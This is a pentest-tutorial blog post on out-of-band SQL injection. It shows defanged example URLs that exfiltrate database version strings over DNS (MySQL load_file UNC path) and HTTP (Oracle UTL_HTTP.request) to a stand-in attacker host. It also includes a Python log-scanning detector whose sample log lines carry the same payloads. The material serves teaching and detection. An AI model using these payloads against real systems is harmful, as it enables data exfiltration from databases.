# Week 38 - Out of Band SQLi

Since last week we covered second-order SQL injection, I wanted to make this week’s post on a similar technique: Out-of-Band SQLi.

If you’ve been following my weekly posts then you should already be plenty familiar with SQL injection, but what the heck does Out-of-Band mean?

Out-of-Band means we are receiving the payload result through a different channel than the payload request. There are two main channels used for retrieving the payload result: DNS and HTTP.

Retrieving the payload result through DNS would look like the following SQL injection:

`vulnerable[.]com/test[.]php?id=1+UNION+SELECT+load_file(CONCAT("\\\\",(SELECT+@@version),".attacker[.]com\\test"))`

Since the CONCAT function combines multiple strings into one, this injection will cause the back-end database to try to load the following UNC path, and resolving the hostname in that path is what generates the DNS request:

`\\\\10.3.16-MariaDB[.]attacker[.]com\\test`

So if we have a listener running on our attacker server, we can wait for incoming DNS requests and retrieve the results!

Now, as mentioned before, we can also use HTTP-based exfiltration, which is typically used when the back-end database is Oracle because it supports the UTL\_HTTP.request function:

`vulnerable[.]com/test[.]php?id=1+UNION+SELECT+UTL_HTTP.request('http[:]//attacker[.]com/?version='||(SELECT version FROM v$instance)) FROM dual`

This will issue an HTTP request to the following URL:

`http[:]//attacker[.]com/?version=18.0.0.0.0`

And we can just listen for incoming HTTP connections! This technique can be an exotic way of bypassing WAFs or exploiting a tricky injection. Worth adding to your pentest arsenal!
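From the defender's side, both payloads above leave a recognizable trace in the web access log before any DNS or HTTP callback happens. The following detection sketch is an added example, not code from the original post: the rule names, function names and log lines are constructed for illustration, and it assumes a combined-format access log.

```python
import re
from urllib.parse import unquote_plus, urlsplit

# Out-of-band primitives named in the post, matched after URL decoding.
OOB_PATTERNS = {
    # load_file() whose argument carries a UNC prefix (two backslashes or more)
    "mysql_load_file_unc": re.compile(r"load_file\s*\(.*?\\\\", re.I | re.S),
    # Oracle outbound HTTP request issued from inside a query
    "oracle_utl_http_request": re.compile(r"utl_http\s*\.\s*request\s*\(", re.I),
}
REQUEST_RE = re.compile(r'^(\S+) .*?"[A-Z]+ (\S+) HTTP/[\d.]+"')


def fully_decode(value, max_rounds=3):
    """URL-decode repeatedly so double-encoded payloads are still seen."""
    for _ in range(max_rounds):
        decoded = unquote_plus(value)
        if decoded == value:
            break
        value = decoded
    return value


def scan_access_log(lines):
    """Return (client_ip, rule_name, path) for each suspicious request."""
    hits = []
    for line in lines:
        m = REQUEST_RE.match(line)
        if not m:
            continue  # not a request line we can parse
        client, target = m.groups()
        parts = urlsplit(target)
        query = fully_decode(parts.query)
        for rule, pattern in OOB_PATTERNS.items():
            if pattern.search(query):
                hits.append((client, rule, parts.path))
    return hits


# Constructed sample log lines (not real traffic); hosts are reserved example names.
SAMPLE_LOG = [
    '198.51.100.7 - - [01/Jan/2024:10:00:01 +0000] "GET /test.php?id=1 HTTP/1.1" 200 512',
    '198.51.100.7 - - [01/Jan/2024:10:00:05 +0000] "GET /test.php?id=1+UNION+SELECT+load_file(CONCAT(%27%5C%5C%5C%5C%27,(SELECT+@@version),%27.attacker.example%5C%5Ctest%27)) HTTP/1.1" 200 498',
    '203.0.113.9 - - [01/Jan/2024:10:02:11 +0000] "GET /test.php?id=1+UNION+SELECT+UTL_HTTP.request%2528%2527http://attacker.example/?version=%2527||(SELECT+version+FROM+v$instance))+FROM+dual HTTP/1.1" 200 498',
    '192.0.2.44 - - [01/Jan/2024:10:03:40 +0000] "GET /search.php?q=mysql+load_file+docs HTTP/1.1" 200 2048',
]

if __name__ == "__main__":
    print(scan_access_log(SAMPLE_LOG))
```

Payloads sent in POST bodies or headers never reach the access log, so the same rules belong at the WAF or database audit layer as well. Restricting outbound DNS and HTTP from the database host closes the channel itself.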

![](/files/GMtsgvLKwNnBK2SZd1fJ)


